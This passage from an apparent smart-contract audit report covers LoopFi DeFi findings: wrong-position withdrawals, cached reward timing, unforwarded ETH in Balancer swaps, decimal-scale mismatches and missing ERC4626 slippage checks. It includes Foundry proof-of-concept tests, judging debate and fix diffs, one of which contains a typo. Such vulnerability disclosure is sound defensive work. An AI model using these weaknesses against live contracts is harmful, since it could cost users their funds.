function _onDeposit(address vault, address /*position*/, address src, uint256 amount) internal override returns (uint256) { address collateral = address(ICDPVault(vault).token()); // if the src is not the collateralToken, we need to deposit the underlying into the ERC4626 vault @> if (src != collateral) { address underlying = IERC4626(collateral).asset(); IERC20(underlying).forceApprove(collateral, amount); amount = IERC4626(collateral).deposit(amount, address(this)); } IERC20(collateral).forceApprove(vault, amount); return ICDPVault(vault).deposit(address(this), amount); }
@pkqs90 PoC (coded) is requested. Please provide it ASAP.
Also the impact is not clear. I am assuming the report implies that the functionality doesn’t work as intended. But elaboration on this is required.
incorrectly checksauxSwap.assetIn
should be equal tocollateralParams.targetToken
. This is incorrect, becauseauxSwap.assetIn
should be the token used to swap forcollateralParams.targetToken.
@Koolex - I created a PoC based on the UT the sponsors provided. There are only 2 changes (which I also commented out in code):
- Use
instead ofPositionAction20
.- Change
, since the vault’s collateral token istoken
. (The previous UTtest_deposit_vault_with_entry_swap_from_USDC
marked this asUSDC
, which is incorrect).Put this code inside PositionAction20.t.sol, and you will find this code reverts with error
. However, this should not revert, because the input it provides is correct.The use case is: User initially has USDC, user wishes to perform swap from USDC to
and deposittoken
in vault.function test_PoC() public { // Change 1: Use PositionAction4626 instead of PositionAction20. PositionAction4626 positionAction4626 = new PositionAction4626( address(flashlender), address(swapAction), address(poolAction), address(vaultRegistry) ); uint256 depositAmount = 10_000 * 1e6; uint256 amountOutMin = (depositAmount * 1e12 * 98) / 100; // convert 6 decimals to 18 and add 1% slippage deal(address(USDC), user, depositAmount); // build increase collateral params bytes32[] memory poolIds = new bytes32[](1); poolIds[0] = stablePoolId; address[] memory assets = new address[](2); assets[0] = address(USDC); assets[1] = address(token); // Change 2: Change targetToken to `token`, since the vault's collateral token is `token`. (The previous UT `test_deposit_vault_with_entry_swap_from_USDC` marked this as `USDC`, which is incorrect ). CollateralParams memory collateralParams = CollateralParams({ targetToken: address(token), amount: 0, // not used for swaps collateralizer: address(user), auxSwap: SwapParams({ swapProtocol: SwapProtocol.BALANCER, swapType: SwapType.EXACT_IN, assetIn: address(USDC), amount: depositAmount, // amount to swap in limit: amountOutMin, // min amount of collateral token to receive recipient: address(userProxy), deadline: block.timestamp + 100, args: abi.encode(poolIds, assets) }) }); uint256 expectedCollateral = _simulateBalancerSwap(collateralParams.auxSwap); vm.prank(user); USDC.approve(address(userProxy), depositAmount); vm.prank(user); userProxy.execute( address(positionAction4626), abi.encodeWithSelector( positionAction4626.deposit.selector, address(userProxy), address(vault), collateralParams, emptyPermitParams ) ); (uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy)); assertEq(collateral, expectedCollateral); assertEq(debt, 0); }
Error (7920): Identifier not found or not unique. --> src/test/integration/PositionAction20.t.sol:861:9: | 861 | PositionAction4626 positionAction4626 = new PositionAction4626(
Anything to add here to fix this error?
@Koolex - Add this import in the beginning of file:
import {PositionAction4626} from "../../proxy/PositionAction4626.sol";
The function reverts as @pkqs90 stated.
[FAIL. Reason: PositionAction__deposit_InvalidAuxSwap()] test_PoC() (gas: 4270979) Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 884.18ms (4.20ms CPU time) Ran 1 test suite in 887.08ms (884.18ms CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests) Failing tests: Encountered 1 failing test in src/test/integration/PositionAction20.t.sol:PositionAction20Test [FAIL. Reason: PositionAction__deposit_InvalidAuxSwap()] test_PoC() (gas: 4270979)
The most common use case is to swap random input
, and deposittargetToken
into vault. For this case, if we forcetargetToken
to beinputToken
, the swap doesn’t make sense.I believe this is a valid concern. Stays as-is. The function doesn’t seem to work as intended.
[M-35] PositionAction4626.sol#_onWithdraw
should withdraw from position
CDPVault position instead of address(this)
Submitted by pkqs90, also found by pkqs90 and zhaojohnson
In PositionAction4626
, the _onWithdraw
should withdraw the token from position
CDPVault position. However, currently it withdraws from address(this)
. This is inconsistent to the parent contract PositionAction.sol
, which specifically states the operation should handle the position
Also, in contrast, we can check the PositionAction20
contract, it withdraws from the position
function _onWithdraw(address vault, address /*position*/, address dst, uint256 amount) internal override returns (uint256) {
> uint256 collateralWithdrawn = ICDPVault(vault).withdraw(address(this), amount);
// if collateral is not the dst token, we need to withdraw the underlying from the ERC4626 vault
address collateral = address(ICDPVault(vault).token());
if (dst != collateral) {
collateralWithdrawn = IERC4626(collateral).redeem(collateralWithdrawn, address(this), address(this));
return collateralWithdrawn;
function _onWithdraw(address vault, address position, address /*dst*/, uint256 amount) internal override returns (uint256) {
> return ICDPVault(vault).withdraw(position, amount);
/// @notice Hook to withdraw collateral from CDPVault, handles any CDP specific actions
/// @param vault The CDP Vault
> /// @param position The CDP Vault position
/// @param dst Token the caller expects to receive
/// @param amount The amount of collateral to deposit [wad]
/// @return Amount of collateral (or dst) withdrawn [CDPVault.tokenScale()]
function _onWithdraw(address vault, address position, address dst, uint256 amount) internal virtual returns (uint256);
Recommended Mitigation Steps
- uint256 collateralWithdrawn = ICDPVault(vault).withdraw(address(this), amount);
+ uint256 collateralWithdrawn = ICDPVault(vault).withdraw(position, amount);
Please elaborate on the impact, will re-evaluate in PJQA.
@Koolex - The proxy supports depositing/withdrawing collateral from positions other than the proxy itself. An example can be found in unit tests, where a user creates a position for another address (aliceProxy).
The issue here is that for PositionAction4626, it only supports actions on the vault of the sender proxy, and not any other address. To make a comparison, both PositionAction20 and PositionActionPendle supports it, only PositionAction4626 lack this functionality.
function test_deposit_to_an_unrelated_position() public { // create 2nd position address alice = vm.addr(0x45674567); PRBProxy aliceProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(alice)))); uint256 depositAmount = 10_000 ether; deal(address(token), user, depositAmount); CollateralParams memory collateralParams = CollateralParams({ targetToken: address(token), amount: depositAmount, collateralizer: address(user), auxSwap: emptySwap // no entry swap }); vm.prank(user); token.approve(address(userProxy), depositAmount); vm.prank(user); userProxy.execute( address(positionAction), abi.encodeWithSelector( positionAction.deposit.selector, address(aliceProxy), address(vault), collateralParams, emptyPermitParams ) ); (uint256 collateral, uint256 debt, , , , ) = vault.positions(address(aliceProxy)); assertEq(collateral, depositAmount); assertEq(debt, 0); }
Stays as-is.
[M-36] ChefIncentivesController caches endRewardTime
, which is not required, and may cause issues during reward update
Submitted by pkqs90, also found by pkqs90, hash (1, 2), and novamanbg
When calculating the endRewardTime
, there is a cache mechanism that caches the result for endingTime.updateCadence
(in UT it is set to 2 days). However, during this period, if anything changes, the endRewardTime
would be incorrect. For example:
- If
increases, then the realendRewardTime
would be smaller than the cachedendRewardTime
. - If new rewards (LOOP Tokens) are registered, the real
would be larger than the cachedendRewardTime
If the cached endRewardTime
is smaller than expected, this will cause the rewards to be not distributed for the time period.
If the cached endRewardTime
is larger than expected, the some pools may receive rewards after when they should, causing less rewards for other pools.
function _updatePool(VaultInfo storage pool, uint256 _totalAllocPoint) internal {
uint256 timestamp = block.timestamp;
uint256 endReward = endRewardTime();
if (endReward <= timestamp) {
timestamp = endReward;
if (timestamp <= pool.lastRewardTime) {
(uint256 reward, uint256 newAccRewardPerShare) = _newRewards(pool, _totalAllocPoint);
accountedRewards = accountedRewards + reward;
pool.accRewardPerShare = pool.accRewardPerShare + newAccRewardPerShare;
pool.lastRewardTime = timestamp;
function endRewardTime() public returns (uint256) {
if (endingTime.lastUpdatedTime + endingTime.updateCadence > block.timestamp) {
> return endingTime.estimatedTime;
uint256 unclaimedRewards = availableRewards();
uint256 extra = 0;
uint256 length = poolLength();
for (uint256 i; i < length; ) {
VaultInfo storage pool = vaultInfo[registeredTokens[i]];
if (pool.lastRewardTime > lastAllPoolUpdate) {
extra +=
((pool.lastRewardTime - lastAllPoolUpdate) * pool.allocPoint * rewardsPerSecond) /
unchecked {
endingTime.lastUpdatedTime = block.timestamp;
if (rewardsPerSecond == 0) {
endingTime.estimatedTime = type(uint256).max;
return type(uint256).max;
} else {
uint256 newEndTime = (unclaimedRewards + extra) / rewardsPerSecond + lastAllPoolUpdate;
endingTime.estimatedTime = newEndTime;
return newEndTime;
Recommended Mitigation Steps
Always recalculate for endRewardTime()
and remove the cache. This is acceptable, because the _updatePool()
function is only called upon user interactions, and not called regularly, so it is not requried to save gas here.
[M-37] SwapAction.sol#balancerSwap
does not support native ETH as input token
Submitted by pkqs90, also found by pkqs90, Centaur (1, 2, 3, 4), and Sparrow
SwapAction is used to swap tokens using Balancer/Uniswap or join/exit a Pendle pool. Pendle accepts native ETH as input token when joining a Pendle pool, and Balancer accepts native ETH during swap.
We can check that the SwapAction contract also supports passing native ETH as input token, because:
function, which serves as the entry function, is payable;pendleJoin()
along when callingpendleRouter.addLiquiditySingleToken()
However, the issue is that when performing a balancer swap by balancerVault.batchSwap
, the msg.value
is not passed along.
function swap(SwapParams memory swapParams) public payable returns (uint256 retAmount) {
if (swapParams.swapProtocol == SwapProtocol.BALANCER) {
(bytes32[] memory poolIds, address[] memory assetPath) = abi.decode(
(bytes32[], address[])
retAmount = balancerSwap(
} else if (swapParams.swapProtocol == SwapProtocol.UNIV3) {
retAmount = uniV3Swap(
} else if (swapParams.swapProtocol == SwapProtocol.PENDLE_IN) {
retAmount = pendleJoin(swapParams.recipient, swapParams.limit, swapParams.args);
} else if (swapParams.swapProtocol == SwapProtocol.PENDLE_OUT) {
retAmount = pendleExit(swapParams.recipient, swapParams.amount, swapParams.args);
} else revert SwapAction__swap_notSupported();
// Transfer any remaining tokens to the recipient
if (swapParams.swapType == SwapType.EXACT_OUT && swapParams.recipient != address(this)) {
IERC20(swapParams.assetIn).safeTransfer(swapParams.recipient, swapParams.limit - retAmount);
function balancerSwap(
SwapType swapType,
address assetIn,
bytes32[] memory poolIds,
address[] memory assets,
uint256 amount,
uint256 limit,
address recipient,
uint256 deadline
) internal returns (uint256) {
// @auditnote: BUG. Does not pass msg.value.
@> balancerVault.batchSwap(
sender: address(this),
fromInternalBalance: false,
recipient: payable(recipient),
toInternalBalance: false
function pendleJoin(address recipient, uint256 minOut, bytes memory data) internal returns (uint256 netLpOut){
address market,
ApproxParams memory guessPtReceivedFromSy,
TokenInput memory input,
LimitOrderData memory limit
) = abi.decode(data, (address, ApproxParams, TokenInput , LimitOrderData));
if (input.tokenIn != address(0)) {
input.netTokenIn = IERC20(input.tokenIn).balanceOf(address(this));
(netLpOut,,) = pendleRouter.addLiquiditySingleToken{value: msg.value}(recipient, market, minOut, guessPtReceivedFromSy, input, limit);
Recommended Mitigation Steps
- balancerVault.batchSwap(
+ balancerVault.batchSwap{value: msg:value}(
[M-38] PositionAction20._onWithdraw
and PositionPendle20._onWithdraw
also returns token amount in wrong scale
Submitted by nnez, also found by pkqs90
Withdraw operations will invariably revert due to insufficient funds if the collateral’s decimal deviates from 18.
accepts amount in tokenScale
but returns token amount in wad
function withdraw(address to, uint256 amount) external whenNotPaused returns (uint256 tokenAmount) {
tokenAmount = wdiv(amount, tokenScale);
int256 deltaCollateral = -toInt256(tokenAmount);
owner: to,
collateralizer: msg.sender,
creditor: msg.sender,
deltaCollateral: deltaCollateral,
deltaDebt: 0
However, the PositionAction20._onWithdraw
and PositionActionPendle._onWithdraw
functions expect a return value scaled to the collateral’s decimal, as they use this value to transfer the token back to the collateralizer.
See PositionAction20._onWithdraw
and PositionActionPendle._onWithdraw
File: /src/proxy/PositionAction20.sol
function _onWithdraw(address vault, address position, address /*dst*/, uint256 amount) internal override returns (uint256) {
return ICDPVault(vault).withdraw(position, amount); <-- return in wad scale
File: /src/proxy/PositionActionPendle.sol
function _onWithdraw(address vault, address position, address /*dst*/, uint256 amount) internal override returns (uint256) {
return ICDPVault(vault).withdraw(address(position), amount); <-- return in wad scale
File: /src/proxy/PositionAction.sol
function _withdraw(address vault, address position, CollateralParams calldata collateralParams) internal returns (uint256) {
uint256 collateral = _onWithdraw(vault, position, collateralParams.targetToken, collateralParams.amount);
|-- the below operation will fail because it uses collateral amount in wrong scale
// perform swap from collateral to arbitrary token
if (collateralParams.auxSwap.assetIn != address(0)) {
abi.encodeWithSelector(swapAction.swap.selector, collateralParams.auxSwap)
} else {
// otherwise just send the collateral to `collateralizer`
IERC20(collateralParams.targetToken).safeTransfer(collateralParams.collateralizer, collateral);
return collateral;
The problem arises when collateral’s decimal is not 18 (wad). For instance, let’s say the collateral’s decimal is 8:
- Users want to withdraw
tokens, users must call withdraw function withamount=1e8
. CDPVault.withdraw
tokens back but it returns token amount in wad,1e18
will attempt to transfer1e18
tokens which is much greater than1e8
; therefore, the execution revert due to insufficient funds.
Additional Notes
I want to emphasize that although this issue is similar to WP-M2, it is not the same finding as it happens in a different code path.
Recommended Mitigations
Convert return amount to token scale first before returning value.
function _onWithdraw(address vault, address position, address /*dst*/, uint256 amount) internal override returns (uint256) {
uint wadAmount = ICDPVault(vault).withdraw(address(position), amount);
return wmul(wadAmount, ICDPVault(vault).tokenScale());
Looks like the same issue as WP-M2. If it is not the same, please point out the diff - will re-evaluate in PJQA.
@Koolex - To answer your question, WP-M2 specifically mentions
and does not includePositionAction20
.Therefore, we cannot assume that it is a known issue, as it exists in different contracts.
Stays as-is.
[M-39] Lack of slippage check while interacting with ERC4626 Vault in PositionAction4626
could lead to users’ fund loss
Submitted by nnez
Users’ funds loss from ERC4626 exchange rate change or manipulated.
Proof of Concept
If users specify collateralParams.targetToken
as ERC4626’s underlying token, PositionAction4626
will attempt to deposit the targetToken
to ERC4626 vault in order to retrieve the collateral token corresponding to the CDP Vault.
The execution flow:
PositionAction.deposit --> PositionAction._deposit --> PositionAction4626._onDeposit
Here is the implementation used to convert from ERC4626’s underlying to ERC4626 token:
See PositionAction4626._onDeposit
function _onDeposit(address vault, address /*position*/, address src, uint256 amount) internal override returns (uint256) {
address collateral = address(ICDPVault(vault).token());
// if the src is not the collateralToken, we need to deposit the underlying into the ERC4626 vault
if (src != collateral) {
address underlying = IERC4626(collateral).asset();
IERC20(underlying).forceApprove(collateral, amount);
amount = IERC4626(collateral).deposit(amount, address(this)); <-- No slippage check
IERC20(collateral).forceApprove(vault, amount);
return ICDPVault(vault).deposit(address(this), amount);
In this implementation, there is no slippage check when performing a deposit on target ERC4626’s vault. This could leads to users’ fund loss from slippage as ERC4626’s exchange rate can change or be manipulated while users’ transaction is pending.
This also happens in withdraw
execution flow:
PositionAction.withdraw --> PositionAction._withdraw --> PositionAction4626._onWithdraw
If users specify a different dst
(destination) token, it attempts to redeem that token from ERC4626 vault.
function _onWithdraw(address vault, address /*position*/, address dst, uint256 amount) internal override returns (uint256) {
uint256 collateralWithdrawn = ICDPVault(vault).withdraw(address(this), amount);
// if collateral is not the dst token, we need to withdraw the underlying from the ERC4626 vault
address collateral = address(ICDPVault(vault).token());
if (dst != collateral) {
collateralWithdrawn = IERC4626(collateral).redeem(collateralWithdrawn, address(this), address(this)); <-- No slippage check
return collateralWithdrawn;
Recommended Mitigations
Allow users to specify their slippage tolerance when interacting with PositionAction4626
Assessed type
amarcu (LoopFi) confirmed and commented:
Adding the splippage check will help but the funds are not directly at risk and cannot be stolen. We suggest this issue be a medium and not a high.
Koolex (judge) decreased severity to Medium
As said by the sponsor, the funds are not at risk. I cannot think a case where slippage when depositing/withdrawing in a 4626 vault could cause a loss of fund. User depositing in a Vault simply get shares representing how much of the total vault he deposited.
If he redeem, he will get back his assets, or more if vault yielded in between. All issues about slippage when depositing/withdrawing from a 4626 vaults are invalid.
Firstly, sponsors said that funds are not directly at risk. That doesn’t mean there are no funds at risk. There is always some degree of slippage loss when depositing or minting in an ERC4626 vault, and this loss is directly tied to the ERC4626 exchange rate.
As noted in OpenZeppelin’s documentation, the exchange rate can fluctuate, leading to discrepancies between the amount deposited and the corresponding shares received. A log-scale graph of this relationship highlights that the shares received may not accurately reflect the deposited amount due to these exchange rate changes.
ERC4626 is inherently prone to this issue because it was designed to be called by smart contract account not by EOA. It assumes that any integrating smart contract will implement slippage protection, ensuring that the shares received can be redeemed within an allowed slippage range. Without such protection, EOAs are more vulnerable to losses from exchange rate fluctuations. This concern is further discussed in detail by the Ethereum Magicians community in their proposal for EIP-5143 (Slippage Protection for Tokenized Vaults).
Additionally, Zellic’s analysis of ERC4626 vaults highlights the risks for EOAs when interacting directly with these vaults, specifically mentioning that “what you give is not necessarily what you get” due to slippage and exchange rate variability (source 1, source 2).
The ERC4626 standard contract of OZ acknowledges slippage concerns, as shown in the comments IERC4626 interface.
Moreover, the audit information do not specify which ERC4626 vault will be integrated. As a result, we must assume the contract should be compatible with any vault adhering to the ERC4626 standard, including those susceptible to exchange rate manipulation. Without slippage protection in place, slippage losses could be as high as 100%. (exchange rate manipulation in ERC4626 vaults).
Technical aside, if slippage during interactions with ERC4626 vaults were not a significant issue, it wouldn’t be such a widely discussed topic. The prevalence of discussions around slippage highlights the importance of addressing this concern.
@nnez - The OZ source discuss about rounding error, here’s what they say:
This rounding is often negligible because of the amount at stake. If you deposit 1e9 shares worth of tokens, the rounding will have you lose at most 0.0000001% of your deposit. However if you deposit 10 shares worth of tokens, you could lose 10% of your deposit Tokens have at least 6 decimals, so the rounding error is at most 0.0001%, which is negligible.
The Zellic source is referring to “slippage” due to:
- Rounding error, we already shown that this is negligible, unless the exchange rate are so high and close to the token decimals that it is not considered dust.
- Vault deposit/withdraw fees. But vault fees are known in advance so user should be able to carefully select the values he will input when calling the vault functions to take into account the fees.
Zellic examples doesn’t seems to relate with what is referred as slippage in the submissions: they discuss about the difference of asset taken from user them when he calls
, and asset given to user them when he callsredeem
.The amount of underlying assets a user may receive through redeeming their shares in the vault (
) can be significantly different than the amount that would be taken from them when minting the same quantity of shares (previewMint
). The differences may be small (e.g., if due to rounding error) or significant (e.g., if a vault implements withdrawal or deposit fees)In those conditions don’t see how adding a slippage parameter will prevent this, if we consider user is aware of the fees, and of the exchange rate ? If the Vault sees his assets increasing due to yield before user “redeem” tx is executed, then he will get more asset than expected before the yield. Same logic can apply for deposit, if vault yielded, he will have at least a better position.
About the exchange rate manipulation in Euler article, all of these manipulation goals are to increase the exchange rate by sending assets into the vault without minting the expected number of equivalent shares (the idea being to increase share price and use the inflated shares to borrow in another protocol, and the attack is usually executed in 1 tx.
Also, an increased exchange rate would be beneficial for someone withdrawing from the vault, as his shares would allow him to withdraw more assets.
To finish, I agree there are situations where a harmful slippage could occur:
- When the vault incur a loss right before user tx is executed (how ?);
- If user is subject to first depositor attack.
But in my opinion, 1 shouldn’t occur in a vault meant to generate yield and 2 too, as far as the vault implement recent ERC4626 contracts or follows well known practices to avoid it.
No problem @Infect3d. My answer was also long and I do appreciate you taking the time and sorry if you find some of the examples not quite relevant.
However, your answer actually sent me into the rabbit hole, searching for my answer on the topic.
- The exchange rate of ERC4626 vault depends on how the vault utilize its assets (its strategy), the yield-bearing notion doesn’t necessitate that the exchange rate is an ever-growing rate.
The example is actually the StakingLPEth contract itself. When the protocol implements a mechanism to distribute loss from bad debt among shareholders (#186), this can be a great example to answer your question.
“A liquidation transaction that realizes the bad debt for the vault is executed before users’ withdrawal transaction”.
This can be problematic as users might want to exit as fast as possible before the loss is realized but if they fail to do so they might want to hold on to those shares and decide not to realize the loss right away (as they can choose wait for the interest rate or protocol reserve to catch up). A slippage protection mechanism can definitely help with this situation.
- I agree that the first depositor attack should practically be mitigated if the vault owner follows a proper security practice.
However, we’re dealing with a generic ERC4626 here as the audit information doesn’t specify which vault is going to be integrate into the protocol. An integrating vault might not use OZ ERC4626 as the base contract and the mitigating mechanism (which ERC4626 also doesn’t dictate this) might not be there.
In conclusion,
- Can happen under certain situations and it can cause unexpected loss.
- Can happen but the likelihood depends on how you view the burden of implementing mitigation of the integrating vault as the standard doesn’t dictate it. I found this while I was digging around the topic:
- https://forum.openzeppelin.com/t/erc4626-inflation-attack-discussion/41643/9
- https://github.com/OpenZeppelin/openzeppelin-contracts/issues/5223
It seems like
might not be effective against inflation attack on an empty vault in some cases
@nnez, thank you again, really appreciated these insightful information you provided.
- You are right here, forgot that PoolV3 had that peculiarity (all these escalations I’ve created come from notes I’ve taken
2 months ago).- Very interesting situation here, risky but well thought. Never seen this used until today, thanks for sharing. I don’t have much to add to this conversation, what you say make sense.
Thanks everyone. This stays as-is.
Low Risk and Non-Critical Issues
For this audit, 23 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by Bauchibred received the top score from the judge.
The following wardens also submitted reports: Rhaydden, pkqs90, K42, inh3l, 0xhacksmithh, Afriauditor, Trooper, chaduke, Agontuk, atoko, peanuts, minglei-wang-3570, Sparrow, Kaysoft, Spearmint, Infect3d, 0xpiken, Centaur, jo13, hash, ustas, and novamanbg.
As per the guidelines in the README, fresh findings related to the previous audits are OOS, which is why they’ve been seperated. To facilitate easier navigation, this report includes two separate tables:
- Contents of the Low/NC reports.
- Notes on Watchpug’s audit findings
Please refer to the appropriate table to ease navigation for either of the sections
Table of Contents for Low/NC
Issue ID | Description |
[01] | ChefIncentivesController#batchUpdateAllocPoint() ChefIncentivesController#_massUpdatePools() would be broken when protocol heavily scales |
[02] | Make repay() and liquidations available in the same scenario |
[03] | Consider allowing price updates within the wait window if the price has moved beyond a certain threshold |
[04] | Consider having a safety buffer applied to liquidations |
[05] | Potential mis-pricing when a token gets removed/deregistered from a Balancer pool |
[06] | Users can sidestep the cooldownDuration in an edge case |
[07] | Consider not relying on an infrequently updated oracle for AURA spot pricing |
[08] | Fallback oracles should be implemented in the CDPVault |
[09] | Configuration changes could drastically affect users and should be behind a timelock |
[10] | Using spot prices directly for liquidations might be unfair for users and leaves them at risk |
[11] | Ensure the use of a shorter stale period in production |
[12] | Rewards could be emitted to some contracts unintentionally |
[13] | Consider making StakingLPEth#unstake() and StakingLPEth.sol as a whole backed by pausable modifiers |
[14] | Liquidations could be front ran |
[15] | Consider making withdrawal of assets via StakingLPEth#unstake() a one step process when cooldownDuration is set to 0 |
[16] | Users can be liquidated in the next block |
[17] | Restrict calling ChefIncentivesController#recoverERC20() on the underlying token |
[18] | Consider relaxing the hardcoded slippage for auto compounding |
[19] | Consider not having Chainlink’s oracle address as an immutable var |
[20] | Setters should always have equality checkers |
[21] | Erroneous reward tokens should not be added |
[22] | Fix typos |
[23] | Follow chainlink best practices and use proxy instead of price aggregator directly |
[24] | Incorrect storage gap sizes are not advised |
[25] | Import declarations should import specific identifiers, rather than the whole file |
[01] ChefIncentivesController#batchUpdateAllocPoint()
would be broken when protocol heavily scales
function batchUpdateAllocPoint(address[] calldata _tokens, uint256[] calldata _allocPoints)
if (_tokens.length != _allocPoints.length) revert ArrayLengthMismatch();
uint256 _totalAllocPoint = totalAllocPoint;
uint256 length = _tokens.length;
for (uint256 i; i < length; ) {
VaultInfo storage pool = vaultInfo[_tokens[i]];
if (pool.lastRewardTime == 0) revert UnknownPool();
_totalAllocPoint = _totalAllocPoint - pool.allocPoint + _allocPoints[i];
pool.allocPoint = _allocPoints[i];
unchecked {
totalAllocPoint = _totalAllocPoint;
emit BatchAllocPointsUpdated(_tokens, _allocPoints);
Also, see the _massUpdatePools()
function that calls:
function _massUpdatePools() internal {
uint256 totalAP = totalAllocPoint;
uint256 length = poolLength();
for (uint256 i; i < length; ) {
_updatePool(vaultInfo[registeredTokens[i]], totalAP);
unchecked {
lastAllPoolUpdate = block.timestamp;
The functions iterate through all pools to update their states. As the number of pools grows (which is expected as protocol scales), these functions may require gas that exceeds the block gas limit, rendering them unusable.
QA, since this relies on the protocol heavily scaling and having pools to the extent where the functions fail due to OOG.
Recommended Mitigation Steps
Consider handling a fixed number of updates per transaction.
[02] Make repay()
and liquidations available in the same scenario
The current logic of the CDPVault
, allows for the pausing of liquidations, but not of repayments of debt.
Now, whereas this logic is safe and best for the user, this is extremely bad for the protocol; considering that naturally the protocol is to be set in a paused state when a black swan event occurs and until this gets sorted out it wouldn’t be unpaused. Due to this, however, a very large loan that’s now liquidatable and accruing bad debt can never get liquidated, because the inherited whenNotPaused
modifier always causes it to revert.
Protocol would be put in an unwanted state. When the Vault is paused and large loans start accruing bad debt since liquidating these loans would not work.
Recommended Mitigation Steps
Consider removing the whenNotPaused
from the liquidation logic.
[03] Consider allowing price updates within the wait window if the price has moved beyond a certain threshold
When updating the price, the keeper is forced to wait for updateWaitWindow
, even if there’s been a massive jump/drop in price.
if (block.timestamp - lastUpdate < updateWaitWindow) revert BalancerOracle__update_InUpdateWaitWindow();
The fixed update window prevents price updates during rapid market changes, potentially leading to the use of stale prices for an extended period.
Borderline low/med.
Recommended Mitigation Steps
Consider allowing price updates within the wait window if the price has moved beyond a certain threshold.
[04] Consider having a safety buffer applied to liquidations
The current liquidation implementation allows for a full liquidation of a position, even if repaying a little debt puts the position back afloat.
// compute collateral to take, debt to repay and penalty to pay
uint256 takeCollateral = wdiv(repayAmount, discountedPrice);
uint256 deltaDebt = wmul(repayAmount, liqConfig_.liquidationPenalty);
uint256 penalty = wmul(repayAmount, WAD - liqConfig_.liquidationPenalty);
if (takeCollateral > position.collateral) revert CDPVault__tooHighRepayAmount();
The liquidator provides a repayAmount
that covers any amount of debt, which then means that a position that just gets liquidatable even by 1%
can be fully liquidated if the liquidator can provide to cover the full amount of collateral via the repayAmount
Borderline low/medium. Borrowers of the protocol may be unfairly liquidated due to minor movements in the market when taking out the max loan. Considering the crypto market is very volatile, in the worst case scenario, a user could be subject to a forced liquidation by the attacker by trying to exploit the spot prices returned from either uniswap/pendle.
Recommended Mitigation Steps
Consider giving some sort of buffer like other protocols can be use here to mitigate this issue; e.g, AAVE. They implement a 50% liquidation if health factor is between 0.9 to 1 and then after 0.9 full liquidation so user will have some buffer time to respond.
[05] Potential mis-pricing when a token gets removed/deregistered from a Balancer pool
In the constructor:
(address[] memory tokens, , ) = balancerVault.getPoolTokens(poolId);
uint256 len = tokens.length;
token0 = (len > 0) ? tokens[1] : address(0);
token1 = (len > 1) ? tokens[2] : address(0);
token2 = (len > 2) ? tokens[3] : address(0);
These token addresses are then used in price calculations:
function _getTokenPrice(uint256 index) internal view returns (uint256 price) {
address token;
if (index == 0) token = token0;
else if (index == 1) token = token1;
else if (index == 2) token = token2;
else revert BalancerOracle__getTokenPrice_invalidIndex();
return chainlinkOracle.spot(token);
The BalancerOracle contract stores token addresses as immutable variables in the constructor. However, if a token is deregistered from the Balancer pool later, the oracle will continue to assume the old status of the pools, leading to incorrect price calculations.
If a token is deregistered, the oracle will use outdated token addresses, resulting in incorrect price calculations and updates.
Recommended Mitigation
Retrieve the Balancer pool tokens via getPoolTokens()
whenever needed instead of caching them, to ensure the latest pool composition is always used.
[06] Users can sidestep the cooldownDuration
in an edge case
enforces a cooldown period before users can finalize withdrawals:
function unstake(address receiver) external {
UserCooldown storage userCooldown = cooldowns[msg.sender];
uint256 assets = userCooldown.underlyingAmount;
if (block.timestamp >= userCooldown.cooldownEnd || cooldownDuration == 0) {
userCooldown.cooldownEnd = 0;
userCooldown.underlyingAmount = 0;
silo.withdraw(receiver, assets);
} else {
revert InvalidCooldown();
/// @notice redeem assets and starts a cooldown to claim the converted underlying asset
/// @param assets assets to redeem
function cooldownAssets(uint256 assets) external ensureCooldownOn returns (uint256 shares) {
if (assets > maxWithdraw(msg.sender)) revert ExcessiveWithdrawAmount();
shares = previewWithdraw(assets);
cooldowns[msg.sender].cooldownEnd = uint104(block.timestamp) + cooldownDuration;
cooldowns[msg.sender].underlyingAmount += uint152(assets);
_withdraw(msg.sender, address(silo), msg.sender, assets, shares);
But if cooldownDuration
is reset to 0 after a cooldown initiation, users can bypass this wait immediately. Initially, users must wait until the cooldown period ends to withdraw assets. However, resetting cooldownDuration
to 0 allows immediate withdrawals, circumventing the intended delay.
Users can sidestep the cooldown period if cooldownDuration
is reset to 0, allowing immediate withdrawals despite the initial requirement to wait, compromising the protocol’s risk management strategy if specifically set for these previously attempted withdrawals.
Recommended Mitigation Steps
Modify the withdrawal condition to separately handle active cooldowns and zero cooldownDuration
, preventing immediate withdrawals unless no cooldown is pending.
[07] Consider not relying on an infrequently updated oracle for AURA spot pricing
The AuraVault
contract relies on an oracle for calculating the AURA spot price, which is not updated frequently, potentially leading to inaccurate price reflections and impacting various operations within the vault.
The _getAuraSpot
function in the AuraVault
contract calculates the AURA spot price by fetching the time-weighted average price from a custom oracle. This oracle is not updated frequently, which leads to discrepancies between the calculated price and the actual market value of AURA.
Here we have an infrequent updates, because for Balancer/Aura oracles, the update to the price is only done whenever a transaction (e.g., swap
) within the pool is triggered (see here, for example). Due to the lack of updates, the price provided by the Oracle might not reflect the true value of the assets. Attached in the linked oracle, we can see how even for days no updates were made to the price if tx were not processed.
function _getAuraSpot() internal view returns (uint256 price) {
uint256 ethPrice;
(, int256 answer, , , ) = AggregatorV3Interface(ETH_CHAINLINK_FEED).latestRoundData();
ethPrice = wdiv(uint256(answer), ETH_CHAINLINK_DECIMALS);
IPriceOracle.OracleAverageQuery[] memory queries = new IPriceOracle.OracleAverageQuery[](1);
queries[0] = IPriceOracle.OracleAverageQuery(IPriceOracle.Variable.PAIR_PRICE, 1800, 0);
uint256[] memory results = IPriceOracle(auraPriceOracle).getTimeWeightedAverage(queries);
price = wmul(results[0], ethPrice);
The infrequent updates to the oracle used for AURA spot price calculation can result in the price not accurately reflecting the true market value of AURA. This can affect:
- Vault Settlement: Inaccurate asset valuation can lead to incorrect settlement values, impacting the distribution of rewards and potentially causing losses.
- Deleverage/Liquidation of Accounts: Users close to the liquidation threshold might face premature deleveraging or liquidation due to undervalued assets.
- Borrowing: Overvaluation could allow users to borrow more than they should, based on inaccurate asset prices.
Recommended Mitigation Steps
Consider using more frequently updated oracles, such as Chainlink/Pyth, as the primary source for price information. If a secondary oracle is needed, ensure it provides timely updates to reflect market conditions accurately.
[08] Fallback oracles should be implemented in the CDPVault
/// @notice Oracle of the collateral token
IOracle public immutable oracle;
Now whenever any pricing logic is to be implemented, this function is called:
function spotPrice() public view returns (uint256) {
return oracle.spot(address(token));
